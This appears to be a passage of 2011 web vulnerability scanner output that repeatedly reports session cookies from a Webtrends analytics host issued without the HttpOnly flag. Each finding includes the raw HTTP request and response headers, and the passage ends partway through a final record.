3b8ec6130e8355f13082f285830ae14702ba6d55

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=CE9B1DDF1E855CAA5EF375381E1009A7; Path=/ots

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 15:42:08 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=CE9B1DDF1E855CAA5EF375381E1009A7; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 6131
Connection: Keep-Alive

/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.1 2009-11-24 23:15:52 michae
...[SNIP]...

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
Path:	/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719d4b6c01e1bf8a68d6d6e9ccccf2a0cd29ff193a3d1ad0b394d2f8f4242af9403a72af1a05e85d189bf9584ec2bff31a8183270fc598f5c0622dcbe5b6b6c3716d2cae6c3d77eb1fac20a35ebbc277e1aeeb742cd4298b473505e34b1f2b95f8c69253cd9c8e2e0fcafa4f3b2ecaa7b9787268975646c9a6fe12e0dc96b33e5d7f4cfbd4c8b3fb389ac31f4b33b877f9a9e0ab4c5dd1a85e935f84d0f311689f4c87061deb765416dd916a4be71979f8ec8a34c06da9f6274d60a23ad9b1c367b4c85fe0699df97c83df65c6967397bd9edd304b9bcca55469f091879db220e21c48056caf3e341ca810df1dfdb8f8301c58931200004259f201f4ae197f61db2733ce4275be9e72fe1683799230f74c1350a09710efe594ee36a14527ee7039bd0e2c96e0d9d79dacfed1f62fc3c4b92a5f0b96ec20fda11f8dbd256a346ef03c869240646c3700554e268690b9aa736bee58de6154f6dd68f837e5e5476d1fec1e9ec5f73f10cfac52fea671f394a47d58734548db45cc30ad0c0ab24408f351d9809504f3121249a963f2a9ff8cdf343932db86683f208910246bbe0

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=0F965E5297F4C2B170C27D877BBDA9C9; Path=/ots

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 20:34:51 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=0F965E5297F4C2B170C27D877BBDA9C9; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 5953
Connection: Keep-Alive

/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.1 2009-11-24 23:15:52 michae
...[SNIP]...

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
Path:	/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719dfbec80906eeaf8e6b329ad1c66a04d5dce594e3d0e60b235269895e7baf9502a736d5a84b81ecc7b695dddf3bf515e70b0f61e903d0620220ef995b6766604ecdc6f9cffa4ffef19e7d66baea70381de7df55cf37dbe731091e6cb6a3905f846911248595aff0b1f6f3cdbfe3ac30d9c4678e383536c316f12914894b6effc4f298ac54cb7e8293fd68f6a36780748b8600e6979e42ced92cbc2e742b189ed2de622c89f6711a25da45f7eb77c18d8497be4c1899d26a72dc1268f2931c41435eea87148ad684c83cff5d6d663078d1efc44cf2e303e28add

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=F7D705966FF7DF48BA76B4D5749A94FE; Path=/ots

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 20:38:12 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=F7D705966FF7DF48BA76B4D5749A94FE; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 5953
Connection: Keep-Alive

/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.1 2009-11-24 23:15:52 michae
...[SNIP]...

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
Path:	/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719dfbec80906eeaf8e6b329ad1c66a04d5dcf192e3cde61c254f6c88534da58802b5398ea24b9efa9ba685dfd72bea4fa8190c69ae5ede6f0721ccb34e717c6107bcfaf2cfe44f88fec42e36ffe9116f59a6f918a80dd8e17e504876f2e69c508c691b6d9281fff0acd3e99db7f9b07ac79b36cd607e06da5e9c4458d76d0eeac1f394a802d460f590fe6ea7f666d23dccd20abac2d92880ff34a405027857b7f2db653389d23a43638d06e3f765a2d8d598f1062f8fcd643983437aeac41c62611881d352de9d97c32cf54f777d612b929d8913b5bc8b0379af246e1bba7d1821ce8b1b8db8d166b7f52081b0a29c9119cbec293c0d622b875d417cd18cb343d86f39e9542e91ed43fa6a22e9270074c2457c7a6f7d885f3ef87c0e45039908e9b4e1c61756cf4882f9b44c53e34700d5e8a69d54e50f995fbfbccd42df46ec12c17c571639b3606a4f9a72171192c33eabf899bf391631da8883685e0c3d908399b6b31904b650bd8315aa76147e2553c8915e7d80f265952595abbe344d9a610997284107317e59a3b0425eeb9ba191218221aa6f94bb40dcc1e9249cb774bf98ee7407217244aeec16ffd31ba080c2399fd00053ca13a163a0dea3c21fbe005fb9d10032105be4e1a267f21a6d327c62776a8fd1e687a80aec67ee1af4ed0e54af4f4eeec3f11307fd1f196b76867d6c3ce2cb04a55eb0d1bd080093f61802c730698566b99fbd06410a0371a3c5d0ecb5d4a62a86a51effaadb722705ff70b2911f1e9fe6dfeb180f7bc75bac0f70e8d4f717ae71c849b8fd7885af7cbac98053cfe672a0a206ef123ee1a389dbb537e637b82af0456b58f2f21e694e272e3b17ae8b4dac6e66c088819230b1b87b3bf767190709e232b65522d18aefb0cd28a343dd94806e46d85b59ab2735f94d709363d9d6c3740d2c822da5aeaef9d43f4def09ef3a3ab7f0f79ffffe0ba76ece1f931b46058afc36bc07c392f003d9d7b64b7b3f310816786a06f9cace8e1ec1ee2df9d7b272742c2d6b2f8497730a2341d5d1b5104b6e3cc7060ae8e5dc2b974608f86f949ca5e431439c67403cb3a96ff641869c533250de844f4333b65de07d8c0c6d60369e9283307caad2b3076aa574beba2c5c7877c112480c4a35e22b5c3359409cd1bbabcfb72eed138d2a0a7247d2e40b97a8bcac1fdd5d0578d1f5ea254a1447e6df13f3d309b9f4295cc03c2bd6dce17c9d7b4719e6fd142b3e0a873ca4a4ff739ff9679e39af46f80a30198a0132028a5bef72c9a8aeb75b401dd5937044febef7f5cf4b542529731555c8e1669fbcd66bbd1bb3be6ff0b35e620970dbd8af3e53a64b079e712ebdffab8e1287dfd1a058b7a2076df84ef6381d660411bcf39603779ce8aaad2a610b918f82136c57439bf9ebf439a0eaaa7f400dcfd3024409e7cd7280fb6f8e0944439466b3125200cfb7d03b6145c81982f5b012ec80ec6ab1b7d3ed65ff45ae954d6bbe27fa402ecedc2d9bd8420330ed097839576d2daafe311514b0a1ccc5036e963838572c5ed87b103b8fbdc73b97d004d99e6078b48df5e414fcd9020f0a903cadd733bb526a98e398b2537715cc02e2eaf75c692b7d9951da7333d6b7ebf495d591ac74954c5e98b33eab26d0029628cb

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=0B899B0C1CBB2BD7366E35AD2D5AA510; Path=/ots

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719dfbec80906eeaf8e6b329ad1c66a04d5dcf192e3cde61c254f6c88534da58802b5398ea24b9efa9ba685dfd72bea4fa8190c69ae5ede6f0721ccb34e717c6107bcfaf2cfe44f88fec42e36ffe9116f59a6f918a80dd8e17e504876f2e69c508c691b6d9281fff0acd3e99db7f9b07ac79b36cd607e06da5e9c4458d76d0eeac1f394a802d460f590fe6ea7f666d23dccd20abac2d92880ff34a405027857b7f2db653389d23a43638d06e3f765a2d8d598f1062f8fcd643983437aeac41c62611881d352de9d97c32cf54f777d612b929d8913b5bc8b0379af246e1bba7d1821ce8b1b8db8d166b7f52081b0a29c9119cbec293c0d622b875d417cd18cb343d86f39e9542e91ed43fa6a22e9270074c2457c7a6f7d885f3ef87c0e45039908e9b4e1c61756cf4882f9b44c53e34700d5e8a69d54e50f995fbfbccd42df46ec12c17c571639b3606a4f9a72171192c33eabf899bf391631da8883685e0c3d908399b6b31904b650bd8315aa76147e2553c8915e7d80f265952595abbe344d9a610997284107317e59a3b0425eeb9ba191218221aa6f94bb40dcc1e9249cb774bf98ee7407217244aeec16ffd31ba080c2399fd00053ca13a163a0dea3c21fbe005fb9d10032105be4e1a267f21a6d327c62776a8fd1e687a80aec67ee1af4ed0e54af4f4eeec3f11307fd1f196b76867d6c3ce2cb04a55eb0d1bd080093f61802c730698566b99fbd06410a0371a3c5d0ecb5d4a62a86a51effaadb722705ff70b2911f1e9fe6dfeb180f7bc75bac0f70e8d4f717ae71c849b8fd7885af7cbac98053cfe672a0a206ef123ee1a389dbb537e637b82af0456b58f2f21e694e272e3b17ae8b4dac6e66c088819230b1b87b3bf767190709e232b65522d18aefb0cd28a343dd94806e46d85b59ab2735f94d709363d9d6c3740d2c822da5aeaef9d43f4def09ef3a3ab7f0f79ffffe0ba76ece1f931b46058afc36bc07c392f003d9d7b64b7b3f310816786a06f9cace8e1ec1ee2df9d7b272742c2d6b2f8497730a2341d5d1b5104b6e3cc7060ae8e5dc2b974608f86f949ca5e431439c67403cb3a96ff641869c533250de844f4333b65de07d8c0c6d60369e9283307caad2b3076aa574beba2c5c7877c112480c4a35e22b5c3359409cd1bbabcfb72eed138d2a0a7247d2e40b97a8bcac1fdd5d0578d1f5ea254a1447e6df13f3d309b9f4295cc03c2bd6dce17c9d7b4719e6fd142b3e0a873ca4a4ff739ff9679e39af46f80a30198a0132028a5bef72c9a8aeb75b401dd5937044febef7f5cf4b542529731555c8e1669fbcd66bbd1bb3be6ff0b35e620970dbd8af3e53a64b079e712ebdffab8e1287dfd1a058b7a2076df84ef6381d660411bcf39603779ce8aaad2a610b918f82136c57439bf9ebf439a0eaaa7f400dcfd3024409e7cd7280fb6f8e0944439466b3125200cfb7d03b6145c81982f5b012ec80ec6ab1b7d3ed65ff45ae954d6bbe27fa402ecedc2d9bd8420330ed097839576d2daafe311514b0a1ccc5036e963838572c5ed87b103b8fbdc73b97d004d99e6078b48df5e414fcd9020f0a903cadd733bb526a98e398b2537715cc02e2eaf75c692b7d9951da7333d6b7ebf495d591ac74954c5e98b33eab26d0029628cb HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/en-au/netsolutionswa/casestudies.aspx?bladeFlyout=LocalePicker&SearchType=0&navIndex=2&hdrFo=mthdr02
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 15:39:05 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=0B899B0C1CBB2BD7366E35AD2D5AA510; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 6131
Connection: Keep-Alive

/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.1 2009-11-24 23:15:52 michae
...[SNIP]...

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
Path:	/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719dfbec80906eeaf8e6b329ad1c66a04d5dcf192e3cde61c254f6c88534da58802b5398ea24b9efa9ba685dfd72bea4fa8190c69ae5ede6f0721ccb34e717c6107bcfaf2cfe44f88fec42e36ffe9116f59a6f918a80dd8e17e504876f2e69c508c691b6d9281fff0acd3e99db7f9b07ac79b36cd607e06da5e9c4458d76d0eeac1f394a802d460f590fe6ea7f666d23dccd20abac2d92880ff34a405027857b7f2db653389d23a43638d06e3f765a2d8d598f1062f8fcd643983437aeac41c62611881d352de9d97c32cf54f777d612b929d8913b5bc8b0379af246e1bba7d1821ce8b1b8db8d166b7f52081b0a29d9119cb9a4f447873339c33193f96e2f108ab154593263be7f6518d1944fa3b1b1cec003d123452e5333cec0b0f3c0ae168e5d0e9db1a53bf3e808baf3f24e64c14c3f2b1e02cee7dfd5cb0cdcc45ad329b17c70e526b36a57e0b3bf603170be9a33aafff9eca4a1237a8ffe472485706d9f6c895e32c048508fbc64699631b195653c891687399cd539d3d95b6bf7900cb355e8251411b31212492b4091796c5e2d549c235a07490aa42afdae8548a987faccef67a1445162cd38c7499b47ab78ad924ef99525bd815e63ce7e885fe39ca6822ceb3602d0059b0a8f279e80766642b31203aa6d6ee97b9139867ee1aa7ba3f02f41253bf90b753118e080e6a038d7c0b2be2dc588716e7c6fc4e44d4d21802c75c1e8806abefaa114127472ef49590b2b5d5d52a87d622d582fb317c59bf26d4866e09d8a6c7a747582d807bb41131bf80bb4a8a24de4bc3ee7f8eef25e09fc0178bbc46a0a277ef134dbcf1ca97ea6ca96afc78a753694fe0857a6a3e32243f4ef6cc09f2332399d9d6b530b1b82b7bd324435314e635aa5253c38beeb1db2ad850da9fc12d1499010dbb2637e44e058368dcd0c776032f802db4acabefd54c5dee0ba16f60e6a6b2c1ace90fa07cc47b900c5174eceb36fd04d48af115d89be05c6c3e551e620b3a5ade8a9ad503d1f87ea9eae460023c247a3bd2c7432c3944c4d2fe440c587c86375db1c89060973f59d04e9789b6e43a04d4773063e59072ff7d9b9e033c5eb1ba6c5622ab57a7359c1c627019c9cdb4253bf4d2c877529f44ffe96a4e6079d1755855503fb07d4e2f4b2ff8b6dfd9c2bf3df203913969704acae50f9dabbce015db5f187ccaf1e838551259e3d016f9d10ca3f62e1ac73921d7d7f7668c16055fbd964d70510d824bc6a4fc13ede16c8529b3519e560528905a6c698a589515bca2c3dd41390cd58e004bfcb88af5a73e26245b6d033bd9b438c391c763b212a7a30ea79b75490603bcd1af2342fb0e53c16725ac86b99104b7858efe72acb55e7faa22a53e4b676f15b9f3c5097bfaedfeae70071cde9d9213790950c684e4e03df0e2a17e4551cfde0e5517f19b1fc0e374c6183a508779a0763e68b8d5b62c6855cd1e9ce1ab1f80919279c7f38496119233d88d1a3dbc24e85d3d838d5783d2566d68a0051f463b6f4bfdd3331d06c8b6a5d51c76f15a5d21443dbd0c6670c7bdaa3be0a104bbf57876dba9c5c928ddf236591ef12aa7c129be5265b8cd9ca3383564f530c9dc873419440ef867fa5712fc8cd9d589f6acaa54857770a79f59f4618f43dadef23cadec93964ed4b1e92d4a0d2076ce9ef36df78c97dfc78977bd6191d8ced1c3fb5760e1e47e4a45c795f13d92fda6a31a2c06cbc8a0c8e2a660ebbf5d623b135ad8ab210b8c645d4f6137873627d59f7fba294317baec039dc250131ca3fbe973a9a77984547c4816041b9c62

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=96E1638C7BDB082433E3C6C43599B744; Path=/ots

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719dfbec80906eeaf8e6b329ad1c66a04d5dcf192e3cde61c254f6c88534da58802b5398ea24b9efa9ba685dfd72bea4fa8190c69ae5ede6f0721ccb34e717c6107bcfaf2cfe44f88fec42e36ffe9116f59a6f918a80dd8e17e504876f2e69c508c691b6d9281fff0acd3e99db7f9b07ac79b36cd607e06da5e9c4458d76d0eeac1f394a802d460f590fe6ea7f666d23dccd20abac2d92880ff34a405027857b7f2db653389d23a43638d06e3f765a2d8d598f1062f8fcd643983437aeac41c62611881d352de9d97c32cf54f777d612b929d8913b5bc8b0379af246e1bba7d1821ce8b1b8db8d166b7f52081b0a29d9119cb9a4f447873339c33193f96e2f108ab154593263be7f6518d1944fa3b1b1cec003d123452e5333cec0b0f3c0ae168e5d0e9db1a53bf3e808baf3f24e64c14c3f2b1e02cee7dfd5cb0cdcc45ad329b17c70e526b36a57e0b3bf603170be9a33aafff9eca4a1237a8ffe472485706d9f6c895e32c048508fbc64699631b195653c891687399cd539d3d95b6bf7900cb355e8251411b31212492b4091796c5e2d549c235a07490aa42afdae8548a987faccef67a1445162cd38c7499b47ab78ad924ef99525bd815e63ce7e885fe39ca6822ceb3602d0059b0a8f279e80766642b31203aa6d6ee97b9139867ee1aa7ba3f02f41253bf90b753118e080e6a038d7c0b2be2dc588716e7c6fc4e44d4d21802c75c1e8806abefaa114127472ef49590b2b5d5d52a87d622d582fb317c59bf26d4866e09d8a6c7a747582d807bb41131bf80bb4a8a24de4bc3ee7f8eef25e09fc0178bbc46a0a277ef134dbcf1ca97ea6ca96afc78a753694fe0857a6a3e32243f4ef6cc09f2332399d9d6b530b1b82b7bd324435314e635aa5253c38beeb1db2ad850da9fc12d1499010dbb2637e44e058368dcd0c776032f802db4acabefd54c5dee0ba16f60e6a6b2c1ace90fa07cc47b900c5174eceb36fd04d48af115d89be05c6c3e551e620b3a5ade8a9ad503d1f87ea9eae460023c247a3bd2c7432c3944c4d2fe440c587c86375db1c89060973f59d04e9789b6e43a04d4773063e59072ff7d9b9e033c5eb1ba6c5622ab57a7359c1c627019c9cdb4253bf4d2c877529f44ffe96a4e6079d1755855503fb07d4e2f4b2ff8b6dfd9c2bf3df203913969704acae50f9dabbce015db5f187ccaf1e838551259e3d016f9d10ca3f62e1ac73921d7d7f7668c16055fbd964d70510d824bc6a4fc13ede16c8529b3519e560528905a6c698a589515bca2c3dd41390cd58e004bfcb88af5a73e26245b6d033bd9b438c391c763b212a7a30ea79b75490603bcd1af2342fb0e53c16725ac86b99104b7858efe72acb55e7faa22a53e4b676f15b9f3c5097bfaedfeae70071cde9d9213790950c684e4e03df0e2a17e4551cfde0e5517f19b1fc0e374c6183a508779a0763e68b8d5b62c6855cd1e9ce1ab1f80919279c7f38496119233d88d1a3dbc24e85d3d838d5783d2566d68a0051f463b6f4bfdd3331d06c8b6a5d51c76f15a5d21443dbd0c6670c7bdaa3be0a104bbf57876dba9c5c928ddf236591ef12aa7c129be5265b8cd9ca3383564f530c9dc873419440ef867fa5712fc8cd9d589f6acaa54857770a79f59f4618f43dadef23cadec93964ed4b1e92d4a0d2076ce9ef36df78c97dfc78977bd6191d8ced1c3fb5760e1e47e4a45c795f13d92fda6a31a2c06cbc8a0c8e2a660ebbf5d623b135ad8ab210b8c645d4f6137873627d59f7fba294317baec039dc250131ca3fbe973a9a77984547c4816041b9c62 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/en-au/netsolutionswa/casestudies.aspx?bladeFlyout=LocalePicker&SearchType=0&navIndex=2&hdrFo=mthdr02
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=367B4F903A397F6235C1F2804D37ACB4

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 15:41:17 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=96E1638C7BDB082433E3C6C43599B744; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 6131
Connection: Keep-Alive

/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.1 2009-11-24 23:15:52 michae
...[SNIP]...

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
Path:	/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719dfbec80906eeaf8e6b329ad1c66a04d5dcf192e3cde61c254f6c88534da58802b5398ea24b9efa9ba685dfd72bea4fa8190c69ae5ede6f0721ccb34e717c6107bcfaf2cfe44f88fec42e36ffe9116f59a6f918a80dd8e17e504876f2e69c508c691b6d9281fff0acd3e99db7f9b07ac79b36cd607e06da5e9c4458d76d0eeac1f394a802d460f590fe6ea7f666d23dccd20abac2d92880ff34a405027857b7f2db653389d23a43638d06e3f765a2d8d598f1062f8fcd643983437aeac41c62611881d352de9d97c32cf54f777d612b929d8913b5bc8b0379af246e1bba7d1821ce8b1b8db8d166b7f52081b0a29d9119cb9a4f447873339c33193f96e2f108ab154593263be7f6518d1944fa3b1b1cec003d123452e5333cec0b0f3c0ae168e5d0e9db1a53bf3e808baf3f24e64c14c3f2b1e02cee7dfd5cb0cdcc45ad329b17c70e526b36a57e0b3bf603170be9a33aafff9eca4a1237a8ffe472485706d9f6c895e32c048508fbc64699631b195653c891687399cd539d3d95b6bf7900cb355e8251411b31212492b4091796c5e2d549c235a07490aa42afdae8548a987faccef67a1445162cd38c7499b47ab78ad924ef99525bd815e63ce7e885fe39ca6822ceb3602d0059b0a8f279e80766642b31203aa6d6ee97b9139867ee1aa7ba3f02f41253bf90b753118e080e6a038d7c0b2be2dc588716e7c6fc4e44d4d21802c75c1e8806abefaa114127472ef49590b2b5d5d52a87d622d582fb317c59bf26d4866e09d8a6c7a747582d807bb41131bf80bb4a8a24de4bc3ee7f8eef25e09fc0178bbc46a0a277ef134dbcf1ca97ea6ca96afc78a753694fe0857a6a3e32243f4ef6cc09f2332399d9d6b530b1b82b7bd324435314e635aa5253c38beeb1db2ad850da9fc12d1499010dbb2637e44e058368dcd0c776032f802db4acabefd54c5dee0ba16f60e6a6b2c1ace90fa07cc47b900c5174eceb36fd04d48af115d89be05c6c3e551e620b3a5ade8a9ad503d1f87ea9eae460023c247a3bd2c7432c3944c4d2fe440c587c86375db1c89060973f59d04e9789b6e43a04d4773063e59072ff7d9b9e033c5eb1ba6c5622ab57a7359c1c627019c9cdb4253bf4d2c877529f44ffe96a4e6079d1755855503fb07d4e2f4b2ff8b6dfd9c2bf3df203913969704acae50f9dabbce015db5f187ccaf1e838551259e3d016f9d10ca3f62e1ac73921d7d7f7668c16055fbd964d70510d824bc6a4fc13ede16c8529b3519e560528905a6c698a589515bca2c3dd41390cd58e004bfcb88af5a73e26245b6d033bd9b438c391c763b212a7a30ea79b75490603bcd1af2342fb0e53c16725ac86b99104b7858efe72acb55e7faa22a53e4b676f15b9f3c5097bfaedfeae70071cde9d9213790950c684e4e03df0e2a17e4551cfde0e5517f19b1fc0e374c6183a508779a0763e68b8d5b62c6855cd1e9ce1ab1f80919279c7f38496119233d88d1a3dbc24e85d3d838d5783d2566d68a0051f463b6f4bfdd3331d06c8b6a5d51c76f15a5d21443dbd0c6670c7bdaa3be0a104bbf57876dba9c5c928ddf236591ef12aa7c129be5265b8cd9ca3383564f530c9dc8734195e13e473e5477f80fae3f4f889c7a853856a70bf995a8208e85de0f4cf1d9dccbaa929d2fcbc646e010a6083c1be46d0eb909292c053b14b8795919ce8dc3067b1bb3d7345cb89da2f89fef0a17b13309a9ef385b98035afeb4a79786d398dba2f4f8e65081d313780362dd1cd7eef7b4646eaea4084d0667e77d299cb65a1b72184547c481603bc57d1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=BF7780E003CE01313D85D5C6CF53E033; Path=/ots

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

